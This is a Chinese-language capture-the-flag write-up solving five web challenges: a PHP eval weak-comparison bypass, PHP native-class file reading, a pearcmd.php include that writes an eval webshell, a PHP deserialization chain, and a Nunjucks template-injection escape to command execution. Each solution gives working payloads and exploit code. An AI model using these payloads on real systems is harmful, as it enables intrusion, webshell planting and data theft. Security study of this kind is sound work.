Web
babyphp
弱类型比较
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| <?php
highlight_file(__FILE__);
error_reporting(0);
$num = $_GET['num'];
if (preg_match("/\'|\"|\`| |<|>|?|\^|%|\$/", $num)) {
die("nononno");
}
if (eval("return ${num} != 2;") && $num == 0 && is_numeric($num) != true) {
system('cat flag.php');
} else {
echo '2';
}
|
payload
然后在源码看
ezphp
原生类的利用
1
2
3
4
5
6
| <?php
error_reporting(0);
highlight_file(__FILE__);
$g = $_GET['g'];
$t = $_GET['t'];
echo new $g($t);
|
先用DirectoryIterator配合glob来查询flag
1
| ?g=DirectoryIterator&t=glob://*f*
|
然后使用SplFileObject配合php伪协议读取文件
1
| ?g=SplFileObject&t=php://filter/read=convert.base64-encode/resource=flag.php
|
ezinclude
pearcmd.php写shell
1
2
3
4
5
6
7
8
| <?php
error_reporting(0);
highlight_file(__FILE__);
if(!preg_match("/data|base64|filter|rot13|input/i",$_GET['sdpc']) && isset($_GET['sdpc'])){
include($_GET['sdpc']);
}else{
die("sry");
}
|
payload,用burp发包
1
2
3
4
5
6
7
8
9
10
| GET /?+config-create+/&sdpc=/usr/local/lib/php/pearcmd.php&/<?=eval($_POST[1]);?>+/tmp/v2i.php HTTP/1.1
Host: 43.138.65.13:2021
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
|
然后包含/tmp/v2i.php
payload
1
2
| GET: ?sdpc=/tmp/v2i.php
POST: 1=system('cat flag.php');
|
然后在源码查看
funnyPHP
先使用php7.4的源码泄露漏洞PHP Development Server <= 7.4.21 - Remote Source Disclosur
得到源码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
| <?php
error_reporting(0);
class A{
public $sdpc = ["welcome" => "yeah, something hidden."];
function __call($name, $arguments)
{
$this->$name[$name]();
}
}
class B{
public $a;
function __construct()
{
$this->a = new A();
}
function __toString()
{
echo $this->a->sdpc["welcome"];
}
}
class C{
public $b;
protected $c;
function __construct(){
$this->c = new B();
}
function __destruct(){
$this->b ? $this->c->sdpc('welcom') : 'welcome!'.$this->c;
}
}
class Evil{
function getflag() {
echo file_get_contents('/fl4g');
}
}
if(isset($_POST['sdpc'])) {
unserialize($_POST['sdpc']);
} else {
serialize(new C());
}
?>
|
这里使用php高版本的动态调用函数,以静态函数的方法调用非静态函数
虽然这个特性在php7被废除,但是他只是会报错,而代码依旧会执行
同时由于php7后面对属性修饰符不敏感,所以全部用public就行
exp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
| <?php
class A{
public $sdpc=["sdpc"=>"Evil::getflag"];
public $name;
}
class B{
public $a;
}
class C{
public $b;
public $c;
function __construct(){
$this->b='1';
$this->c=new A();
}
}
class Evil{
function getflag() {
echo file_get_contents('/fl4g');
}
}
$a=new C();
echo serialize($a);
|
payload
1
| sdpc=O:1:"C":2:{s:1:"b";s:1:"1";s:1:"c";O:1:"A":2:{s:4:"sdpc";a:1:{s:4:"sdpc";s:13:"Evil::getflag";}s:4:"name";N;}}
|
Nunjucks
一个Nunjucks模板的ssti
参考SANDBOX BREAKOUT - A VIEW OF THE NUNJUCKS TEMPLATE ENGINE
他把range, cycler, and joiner这三个关键字都ban了,所以要使用其他方法来获取到Function()函数,来新创建一个函数
这里使用"".constructor.constructor和{}.constructor.constructor都能获取到Function()
然后他过滤了一些关键字,使用拼接绕过
过滤了.就使用字典取值的方式,因为这个是基于jinja的,所以后面的绕过方式都跟python的ssti一样
payload
1
| username=admin{{({}["const"%2b"ructor"])["cons"%2b"tructor"]("return(global[\"pr\"%2b\"ocess\"][\"ma\"%2b\"inM\"%2b\"odule\"][\"req\"%2b\"uire\"](\"chil\"%2b\"d_pro\"%2b\"cess\")[\"ex\"%2b\"ecSync\"])(\"cat${IFS}/f*\")")()}}&password=123&login=login
|
